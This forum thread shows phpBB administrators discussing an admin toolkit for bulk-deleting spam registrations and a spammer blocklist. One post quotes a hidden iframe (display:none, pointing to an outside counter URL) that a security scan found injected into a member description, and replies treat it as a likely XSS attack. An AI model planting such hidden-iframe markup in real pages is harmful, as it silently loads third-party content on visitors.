An excellent forum phpBB toolkit.

[kgun]

I have written about the phpBB Admin Toolkit Starfoxtj elswhere. Today I logged in and deleted about 600 members that has only signed up but not confirmed their registration in a few minutes. Done like this:

1. Sort: Order by last visit - Descending.
2. Display 200.
3. Scroll to the bottom.
4. Check with selected. (Groups of 200 selected).
5. Type in the word "delete" in the delete field.
6. Hit delete and the first group of 200 members that only registered but did not confirm registration are deleted). May be too strict, but it is the forum policy.

Then on that Admin toolkit page I noted the following when I run the security scan:

"Malicious information detected:
One or more of the javascript, iframe or embed tags have been detected in this description. Unless you intentionally added this information yourself, this description should be sanitized."

<iframe src=http://googlerank.info/counter style=display:none></iframe>

Anybody that has an idea of what this is?

[JLarthos]

Heya

I can't find the new version of toolkit, I downloaded an older version, but it doesn't work. It seems starfox has been down for at least a couple of weeks. Do you know of another source?

Thanks,
JL

[hpham]

JL: you can check out on PHP site.
KGUN: googlerank.info is not related to google by anyway. It's hosted in Rusia, and it makes me a bit scare. the link included in ifram made my MAC frozen, so it's completely not good. I am not sure what that page does, but I would stay away from it

[JLarthos]

Nope! Can't find toolkit anywhere so far. My site isn't really pubic yet but I'm already getting 3-4 bad sign ups per day. Dang the luck...

Thanks,
JL

[wige]

Kgun, without knowing much (anything) about the plugin you are using, I do know the message you posted indicates someone attempted an XSS exploit on your forum, which the software picked up.

I think from the error message that the page you were viewing displays a description field for each user being listed, and that description field allows users to create their own content, including HTML code. A user then crafted the malicious description to attack either your administrative account or visitors' accounts when they viewed the description.

[kgun]

Quote:

Originally Posted by JLarthos

Heya

I can't find the new version of toolkit, I downloaded an older version, but it doesn't work. It seems starfox has been down for at least a couple of weeks. Do you know of another source?

Thanks,
JL

Yes. It has disappeared. Luckily I got the last version.

No, I do not know of other sources. I have found the last two / three versions great, especially the last one where you can delete all posts by a spammer in one click and delete 1000 spammers in a few clicks.

There has not been a single problem since I deleted the iFrame described above.

Only moderators can post there and read all posts.

[JLarthos]

I found version 2.something. Works fine so far!

Thanks
JL

[JLarthos]

Ran across this site a few days ago, they log ip, username and domain info and provide an sql doc to load to banlist. Seems to have loaded just dandy, though it is a couple of thousand entries, I recognized several domains I've had trouble with. They also have a lookup service for names in their database if you're not sure about one. Let me know what you think.

Stop Forum Spam - Spammer Domains

Of course, I think you might already know about it...

Thanks again,
JL

[kgun]

There are a lot of such lists at various sites.

But I did not know that site, so thank you for the link.

[rose77mary77]

I cant find any new version of toolkit, i am already having oldversion toolkit, i downloasded it from internet, but it not worked.......................